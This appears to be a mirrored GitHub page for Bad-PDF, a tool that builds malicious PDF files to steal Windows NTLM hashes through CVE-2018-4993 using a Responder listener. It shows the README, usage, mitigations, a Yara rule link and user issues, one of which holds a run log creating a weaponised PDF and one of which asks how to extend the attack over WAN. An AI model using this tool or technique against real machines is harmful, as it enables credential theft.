deepzec / bad-pdf Goto Github PK

Steal Net-NTLM Hash using Bad-PDF

License: GNU General Public License v3.0

Python 100.00%

ntlm-hashes badpdf vulnerability ntlm-hash-extraction cve-2018-4993

bad-pdf's Introduction

Bad-Pdf

Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines, it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.

~~This method work on all PDF readers(Any version)~~ most of the EDR/Endpoint solution fail to detect this attack.

Reference : https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/

Update: 14/5/2018

Adobe has released a security update(APSB18-09)to address this vulnerability and CVE-2018-4993 is assigned for this vulnerability.

Disclaimer:

All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

Dependency:

Responder/Kali Linux

Usage:

python badpdf.py

Run Bad-PDF in Kali linux:

Responder waiting for NTLM hash:

Run generated Bad-PDF file on a windows machine and get NTLM hash: :)

Mitigations:

* Vendor patches are not available for this vulnerability

Adobe patch: https://helpx.adobe.com/security/products/acrobat/apsb18-09.html

Microsoft issued an optional security enhancement [0] late last year that provides customers with the ability to disable NTLM SSO authentication as a method for public resources.
Disable external SMB access in firewall to prevent NTLM hash leak to internet

Yara Rule:

https://github.com/InQuest/yara-rules/blob/master/NTLM_Credentials_Theft_via_PDF_Files.rule

Author : Deepu TV ; Feel free to contact me @twitter.com/DeepZec

bad-pdf's People

Contributors

Stargazers

Watchers

Forkers

josejamilena open-sec zshell shantanu561993 techlord-rce samyoyo security-geeks mlynchcogent vysecurity p3t3rp4rk3r gavz cclauss weeshlow l0gan rakesh72 rajivraj firefalc0n ankushgoel27 awesome-security zulou carlcj loveh4ck av1080p ashr h1d3r edwinlu fcccode moriarty2016 haimo918 arryboom suriya73 ro9ueadmin c002 mrtaheramine jermainlaforce redwifiteam rawachraf moheshmohan xuacker jbarcia 3gstudent tyekrgk guardianrg blacktrace saleem144 5bhuv4n35h cephurs paran0ids0ul quikilr pentest30 hax0rg1rl pabit z0edff0x3d sec-db iw00tr00t peterg75 mramu111 d4mn4t10n virgilcj vaginessa lolici123 minkione w00t3k hapazores koncybernet oscarandreu yaoyi2008 scorpioni4e rich-roth luca-m optionalg eltorobiz tim1512 benjitrapp exploit-inters br3ign kimusan ru-dust riviera12345 5up3rc nbg0x1 jakuta-tech qsdj 111cyber0cculte888 leomatias 1337g prodject trietptm-on-coding-algorithms ziednamouchi fingerleakers limkokholefork abraham313 skyw3lker dfirfpi dr1ipr sgachies h4x7789 iraqnophobia hfm attackgithub

bad-pdf's Issues

Responder Not Found

Hi,

when i try to execute the command from the kali terminal ( python bad.pdf.py), i get the error message" Responder not found" I have responder program installed in my usr/bin folder. Any help? much appreciated. Thanks

i think does not work for me :( why?

─[d3vil67@backbox]─[~/Hacking/Bad-Pdf]
└──╼ $sudo python badpdf.py

    ______                 __       _______  ______   ________  
    |_   _ \               |  ]     |_   __ \|_   _ `.|_   __  | 
      | |_) |  ,--.    .--.| | ______ | |__) | | | `. \ | |_ \_| 
      |  __'. `'_\ : / /'`' ||______||  ___/  | |  | | |  _|    
     _| |__) |// | |,| \__/  |       _| |_    _| |_.' /_| |_     
    |_______/ '-;__/ '.__.;__]     |_____|  |______.'|_____|

    By DeepZec 

    =============================================================

Responder detected :/usr/bin/responder
Please enter Bad-PDF host IP:
192.168.100.130
Please enter output file name:
titanic.pdf
Please enter the interface name to listen(Default eth0):
wlan0
[] Starting Process.. []
Bad PDF titanic.pdf created
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -| --| _ | _ | | _ || -| _|
|| ||| ||||||||
|_|

       NBT-NS, LLMNR & MDNS Responder 2.3

Author: Laurent Gaffie ([email protected])
To kill this script hit CRTL-C

[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]

[+] Generic Options:
Responder NIC [wlan0]
Responder IP [192.168.100.130]
Challenge set [1122334455667788]

[!] Error starting TCP server on port 80, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting TCP server on port 445, check permissions or other servers running.
[!] Error starting TCP server on port 139, check permissions or other servers running.
[!] Error starting TCP server on port 1433, check permissions or other servers running.
[!] Error starting TCP server on port 88, check permissions or other servers running.
[!] Error starting TCP server on port 21, check permissions or other servers running.
[!] Error starting TCP server on port 110, check permissions or other servers running.
[!] Error starting TCP server on port 389, check permissions or other servers running.
[!] Error starting TCP server on port 25, check permissions or other servers running.
[!] Error starting TCP server on port 587, check permissions or other servers running.
[!] Error starting TCP server on port 143, check permissions or other servers running.
[+] Listening for events...
[!] Error starting TCP server on port 53, check permissions or other servers running.

Responder Not Found

"Responder not found..
Please enter responder path (Default /usr/bin/responder): "

That is what i get when i run 'python badpdf.py' as root.
I have googled, and read the 'Readme'
I am not sure what to do. Please help. Thank you

Compatibility with MAC OSX OS

OSX operating system requires a '-i' switch for this tool to work

useage on wan

how does it work on wan?

HTTP method

HTTP method is not available in this tool only for me? After I select eth0 it starts responder.
This is how it should look like:

http responder server support

Blocking port 445 on a gateway is considered a best practice which makes using responder's smb service less reliable. Luckily you can get the same results by using responder's http service and specifying the listener with http:/// as the /AA entry. Would it be possible to add support for this to Bad-PDF?

You can have a try. : )